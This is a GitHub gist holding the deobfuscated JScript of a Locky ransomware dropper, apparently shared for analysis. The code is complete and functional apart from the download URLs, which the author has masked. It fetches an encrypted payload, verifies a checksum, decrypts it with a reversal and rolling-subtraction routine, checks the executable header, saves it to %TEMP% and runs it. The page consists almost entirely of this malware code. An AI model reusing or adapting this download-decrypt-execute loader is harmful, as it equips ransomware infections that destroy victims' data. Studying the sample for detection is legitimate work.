-
-
Save cryptobioz/5d613440929975b956b430f728138930 to your computer and use it in GitHub Desktop.
Locky dropper : file fully unobfuscated
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<job><script language="JScript"> | |
var payload_path = WScript["CreateObject"]("WScript.Shell").ExpandEnvironmentStrings("%TEMP%/")+"E8ANs5ZfEe.exe"; | |
// URLs have been, obviously, changed | |
var urls = ["http://XXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"]; | |
var http_methods = ["WinHttpRequest.(31143109).1", "MSXML2.XMLHTTP"]; | |
for(var i=0;i<http_methods["length"];i++){ | |
try{ | |
var download_payload = WScript["CreateObject"](http_methods[i]); | |
break; | |
}catch(e){ | |
continue; | |
} | |
}; | |
var continuer = 1; | |
var j = 0; | |
while(continuer){ | |
try{ | |
if(1 == continuer){ | |
if(j >= urls["length"]){ | |
j = 0; | |
WScript["Sleep"](1000); | |
} | |
download_payload["open"]("GET", urls[j++ % urls["length"]], false); | |
download_payload["send"](); | |
} | |
if(download_payload.readystate < 4){ | |
WScript["Sleep"](100); | |
continue; | |
} | |
var payload_file = WScript["CreateObject"]("ADODB.Stream"); | |
payload_file["open"](); | |
payload_file["type"] = 1; | |
payload_file["write"](download_payload["ResponseBody"]); | |
payload_file["position"] = 0; | |
payload_file["SaveToFile"](payload_path, 2); | |
payload_file["close"](); | |
var payload_content = read_payload(payload_path); | |
payload_content = decrypt_payload(payload_content); | |
if(payload_content["length"] < 102400 || payload_content["length"] > 235520 || !check_header(payload_content)){ | |
continuer = 1; | |
continue; | |
} | |
try{ | |
save_decrypted_payload(payload_path, payload_content); | |
}catch(e){ | |
break; | |
}; | |
WScript["CreateObject"]("WScript.Shell")["Run"](payload_path+" 321"); | |
}catch(e){ | |
WScript["Sleep"](1000); | |
continue; | |
} | |
} | |
// LYUo | |
function read_payload(arg){ | |
var Vt = WScript["CreateObject"]("ADODB.Stream"); | |
Vt["type"]=2; | |
Vt["Charset"] = "437"; | |
Vt["open"](); | |
Vt["LoadFromFile"](arg); | |
var k = Vt["ReadText"]; | |
Vt["close"](); | |
return decode(k); | |
} | |
// NDn2 | |
function decode(arg){ | |
var HOAt1 = new Array(); | |
HOAt1[0xC7]=0x80; | |
HOAt1[0xFC]=0x81; | |
HOAt1[0xE9]=0x82; | |
HOAt1[0xE2]=0x83; | |
HOAt1[0xE4]=0x84; | |
HOAt1[0xE0]=0x85; | |
HOAt1[0xE5]=0x86; | |
HOAt1[0xE7]=0x87; | |
HOAt1[0xEA]=0x88; | |
HOAt1[0xEB]=0x89; | |
HOAt1[0xE8]=0x8A; | |
HOAt1[0xEF]=0x8B; | |
HOAt1[0xEE]=0x8C; | |
HOAt1[0xEC]=0x8D; | |
HOAt1[0xC4]=0x8E; | |
HOAt1[0xC5]=0x8F; | |
HOAt1[0xC9]=0x90; | |
HOAt1[0xE6]=0x91; | |
HOAt1[0xC6]=0x92; | |
HOAt1[0xF4]=0x93; | |
HOAt1[0xF6]=0x94; | |
HOAt1[0xF2]=0x95; | |
HOAt1[0xFB]=0x96; | |
HOAt1[0xF9]=0x97; | |
HOAt1[0xFF]=0x98; | |
HOAt1[0xD6]=0x99; | |
HOAt1[0xDC]=0x9A; | |
HOAt1[0xA2]=0x9B; | |
HOAt1[0xA3]=0x9C; | |
HOAt1[0xA5]=0x9D; | |
HOAt1[0x20A7]=0x9E; | |
HOAt1[0x192]=0x9F; | |
HOAt1[0xE1]=0xA0; | |
HOAt1[0xED]=0xA1; | |
HOAt1[0xF3]=0xA2; | |
HOAt1[0xFA]=0xA3; | |
HOAt1[0xF1]=0xA4; | |
HOAt1[0xD1]=0xA5; | |
HOAt1[0xAA]=0xA6; | |
HOAt1[0xBA]=0xA7; | |
HOAt1[0xBF]=0xA8; | |
HOAt1[0x2310]=0xA9; | |
HOAt1[0xAC]=0xAA; | |
HOAt1[0xBD]=0xAB; | |
HOAt1[0xBC]=0xAC; | |
HOAt1[0xA1]=0xAD; | |
HOAt1[0xAB]=0xAE; | |
HOAt1[0xBB]=0xAF; | |
HOAt1[0x2591]=0xB0; | |
HOAt1[0x2592]=0xB1; | |
HOAt1[0x2593]=0xB2; | |
HOAt1[0x2502]=0xB3; | |
HOAt1[0x2524]=0xB4; | |
HOAt1[0x2561]=0xB5; | |
HOAt1[0x2562]=0xB6; | |
HOAt1[0x2556]=0xB7; | |
HOAt1[0x2555]=0xB8; | |
HOAt1[0x2563]=0xB9; | |
HOAt1[0x2551]=0xBA; | |
HOAt1[0x2557]=0xBB; | |
HOAt1[0x255D]=0xBC; | |
HOAt1[0x255C]=0xBD; | |
HOAt1[0x255B]=0xBE; | |
HOAt1[0x2510]=0xBF; | |
HOAt1[0x2514]=0xC0; | |
HOAt1[0x2534]=0xC1; | |
HOAt1[0x252C]=0xC2; | |
HOAt1[0x251C]=0xC3; | |
HOAt1[0x2500]=0xC4; | |
HOAt1[0x253C]=0xC5; | |
HOAt1[0x255E]=0xC6; | |
HOAt1[0x255F]=0xC7; | |
HOAt1[0x255A]=0xC8; | |
HOAt1[0x2554]=0xC9; | |
HOAt1[0x2569]=0xCA; | |
HOAt1[0x2566]=0xCB; | |
HOAt1[0x2560]=0xCC; | |
HOAt1[0x2550]=0xCD; | |
HOAt1[0x256C]=0xCE; | |
HOAt1[0x2567]=0xCF; | |
HOAt1[0x2568]=0xD0; | |
HOAt1[0x2564]=0xD1; | |
HOAt1[0x2565]=0xD2; | |
HOAt1[0x2559]=0xD3; | |
HOAt1[0x2558]=0xD4; | |
HOAt1[0x2552]=0xD5; | |
HOAt1[0x2553]=0xD6; | |
HOAt1[0x256B]=0xD7; | |
HOAt1[0x256A]=0xD8; | |
HOAt1[0x2518]=0xD9; | |
HOAt1[0x250C]=0xDA; | |
HOAt1[0x2588]=0xDB; | |
HOAt1[0x2584]=0xDC; | |
HOAt1[0x258C]=0xDD; | |
HOAt1[0x2590]=0xDE; | |
HOAt1[0x2580]=0xDF; | |
HOAt1[0x3B1]=0xE0; | |
HOAt1[0xDF]=0xE1; | |
HOAt1[0x393]=0xE2; | |
HOAt1[0x3C0]=0xE3; | |
HOAt1[0x3A3]=0xE4; | |
HOAt1[0x3C3]=0xE5; | |
HOAt1[0xB5]=0xE6; | |
HOAt1[0x3C4]=0xE7; | |
HOAt1[0x3A6]=0xE8; | |
HOAt1[0x398]=0xE9; | |
HOAt1[0x3A9]=0xEA; | |
HOAt1[0x3B4]=0xEB; | |
HOAt1[0x221E]=0xEC; | |
HOAt1[0x3C6]=0xED; | |
HOAt1[0x3B5]=0xEE; | |
HOAt1[0x2229]=0xEF; | |
HOAt1[0x2261]=0xF0; | |
HOAt1[0xB1]=0xF1; | |
HOAt1[0x2265]=0xF2; | |
HOAt1[0x2264]=0xF3; | |
HOAt1[0x2320]=0xF4; | |
HOAt1[0x2321]=0xF5; | |
HOAt1[0xF7]=0xF6; | |
HOAt1[0x2248]=0xF7; | |
HOAt1[0xB0]=0xF8; | |
HOAt1[0x2219]=0xF9; | |
HOAt1[0xB7]=0xFA; | |
HOAt1[0x221A]=0xFB; | |
HOAt1[0x207F]=0xFC; | |
HOAt1[0xB2]=0xFD; | |
HOAt1[0x25A0]=0xFE; | |
HOAt1[0xA0]=0xFF; | |
var arr2 = new Array(); | |
for(var i = 0;i<arg["length"];i++){ | |
var var2 = arg["charCodeAt"](i); | |
if(var2 < 128){ | |
var var3 = var2; | |
}else{ | |
var var3 = HOAt1[var2]; | |
} | |
arr2["push"](var3); | |
}; | |
return arr2; | |
}; | |
// DTx | |
function decrypt_payload(arg){ | |
var v1; | |
var v2 = arg[arg["length"]-4] | arg[arg["length"]-3] << 8 | arg[arg["length"]-2] << (-522 + 538) | arg[arg["length"]-1] << 24; | |
arg["splice"](arg["length"]-4, 4); | |
v1 = 40; | |
for(var i=0;i<arg["length"];i++){ | |
v1 = (v1 + arg[i]) % 0x100000000; | |
}; | |
if(v1 != v2){ | |
return []; | |
} | |
v3 = 30; | |
arg = arg.reverse(); | |
for(var i = 0; i < arg["length"];i++){ | |
var v4 = arg[i] - v3; | |
if(v4 < 0){ | |
v4 += 0x100; | |
} | |
arg[i] = v4; | |
v3 = (v3 + 55) % 256; | |
} | |
return arg; | |
} | |
// Xu9 | |
function check_header(arg){ | |
if(arg[0] == 0x4D && arg[1] == 0x5a){ | |
return true; | |
}else{ | |
return false; | |
} | |
} | |
// QMg4 | |
function encode(arg){ | |
var BCm=new Array(); | |
BCm[0x80]=0x00C7; | |
BCm[0x81]=0x00FC; | |
BCm[0x82]=0x00E9; | |
BCm[0x83]=0x00E2; | |
BCm[0x84]=0x00E4; | |
BCm[0x85]=0x00E0; | |
BCm[0x86]=0x00E5; | |
BCm[0x87]=0x00E7; | |
BCm[0x88]=0x00EA; | |
BCm[0x89]=0x00EB; | |
BCm[0x8A]=0x00E8; | |
BCm[0x8B]=0x00EF; | |
BCm[0x8C]=0x00EE; | |
BCm[0x8D]=0x00EC; | |
BCm[0x8E]=0x00C4; | |
BCm[0x8F]=0x00C5; | |
BCm[0x90]=0x00C9; | |
BCm[0x91]=0x00E6; | |
BCm[0x92]=0x00C6; | |
BCm[0x93]=0x00F4; | |
BCm[0x94]=0x00F6; | |
BCm[0x95]=0x00F2; | |
BCm[0x96]=0x00FB; | |
BCm[0x97]=0x00F9; | |
BCm[0x98]=0x00FF; | |
BCm[0x99]=0x00D6; | |
BCm[0x9A]=0x00DC; | |
BCm[0x9B]=0x00A2; | |
BCm[0x9C]=0x00A3; | |
BCm[0x9D]=0x00A5; | |
BCm[0x9E]=0x20A7; | |
BCm[0x9F]=0x0192; | |
BCm[0xA0]=0x00E1; | |
BCm[0xA1]=0x00ED; | |
BCm[0xA2]=0x00F3; | |
BCm[0xA3]=0x00FA; | |
BCm[0xA4]=0x00F1; | |
BCm[0xA5]=0x00D1; | |
BCm[0xA6]=0x00AA; | |
BCm[0xA7]=0x00BA; | |
BCm[0xA8]=0x00BF; | |
BCm[0xA9]=0x2310; | |
BCm[0xAA]=0x00AC; | |
BCm[0xAB]=0x00BD; | |
BCm[0xAC]=0x00BC; | |
BCm[0xAD]=0x00A1; | |
BCm[0xAE]=0x00AB; | |
BCm[0xAF]=0x00BB; | |
BCm[0xB0]=0x2591; | |
BCm[0xB1]=0x2592; | |
BCm[0xB2]=0x2593; | |
BCm[0xB3]=0x2502; | |
BCm[0xB4]=0x2524; | |
BCm[0xB5]=0x2561; | |
BCm[0xB6]=0x2562; | |
BCm[0xB7]=0x2556; | |
BCm[0xB8]=0x2555; | |
BCm[0xB9]=0x2563; | |
BCm[0xBA]=0x2551; | |
BCm[0xBB]=0x2557; | |
BCm[0xBC]=0x255D; | |
BCm[0xBD]=0x255C; | |
BCm[0xBE]=0x255B; | |
BCm[0xBF]=0x2510; | |
BCm[0xC0]=0x2514; | |
BCm[0xC1]=0x2534; | |
BCm[0xC2]=0x252C; | |
BCm[0xC3]=0x251C; | |
BCm[0xC4]=0x2500; | |
BCm[0xC5]=0x253C; | |
BCm[0xC6]=0x255E; | |
BCm[0xC7]=0x255F; | |
BCm[0xC8]=0x255A; | |
BCm[0xC9]=0x2554; | |
BCm[0xCA]=0x2569; | |
BCm[0xCB]=0x2566; | |
BCm[0xCC]=0x2560; | |
BCm[0xCD]=0x2550; | |
BCm[0xCE]=0x256C; | |
BCm[0xCF]=0x2567; | |
BCm[0xD0]=0x2568; | |
BCm[0xD1]=0x2564; | |
BCm[0xD2]=0x2565; | |
BCm[0xD3]=0x2559; | |
BCm[0xD4]=0x2558; | |
BCm[0xD5]=0x2552; | |
BCm[0xD6]=0x2553; | |
BCm[0xD7]=0x256B; | |
BCm[0xD8]=0x256A; | |
BCm[0xD9]=0x2518; | |
BCm[0xDA]=0x250C; | |
BCm[0xDB]=0x2588; | |
BCm[0xDC]=0x2584; | |
BCm[0xDD]=0x258C; | |
BCm[0xDE]=0x2590; | |
BCm[0xDF]=0x2580; | |
BCm[0xE0]=0x03B1; | |
BCm[0xE1]=0x00DF; | |
BCm[0xE2]=0x0393; | |
BCm[0xE3]=0x03C0; | |
BCm[0xE4]=0x03A3; | |
BCm[0xE5]=0x03C3; | |
BCm[0xE6]=0x00B5; | |
BCm[0xE7]=0x03C4; | |
BCm[0xE8]=0x03A6; | |
BCm[0xE9]=0x0398; | |
BCm[0xEA]=0x03A9; | |
BCm[0xEB]=0x03B4; | |
BCm[0xEC]=0x221E; | |
BCm[0xED]=0x03C6; | |
BCm[0xEE]=0x03B5; | |
BCm[0xEF]=0x2229; | |
BCm[0xF0]=0x2261; | |
BCm[0xF1]=0x00B1; | |
BCm[0xF2]=0x2265; | |
BCm[0xF3]=0x2264; | |
BCm[0xF4]=0x2320; | |
BCm[0xF5]=0x2321; | |
BCm[0xF6]=0x00F7; | |
BCm[0xF7]=0x2248; | |
BCm[0xF8]=0x00B0; | |
BCm[0xF9]=0x2219; | |
BCm[0xFA]=0x00B7; | |
BCm[0xFB]=0x221A; | |
BCm[0xFC]=0x207F; | |
BCm[0xFD]=0x00B2; | |
BCm[0xFE]=0x25A0; | |
BCm[0xFF]=0x00A0; | |
var arr2 = new Array(); | |
var v1 = ""; | |
var v2; | |
var v3; | |
for(var i=0;i<arg["length"];i++){ | |
v2 = arg[i]; | |
if(v2 < 128){ | |
v3 = v2; | |
}else{ | |
v3 = BCm[v2]; | |
} | |
arr2.push(String["fromCharCode"](v3)); | |
} | |
v1 = arr2["join"](""); | |
return v1; | |
} | |
// LTs7 | |
function save_decrypted_payload(payload_path, payload_content){ | |
var Vt = WScript["CreateObject"]("ADODB.Stream"); | |
Vt["type"] = 2; | |
Vt["Charset"] = "437"; | |
Vt["open"](); | |
Vt["writeText"](encode(payload_content)); | |
Vt["SaveToFile"](payload_path, 2); | |
Vt["close"](); | |
}; | |
</script></job> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment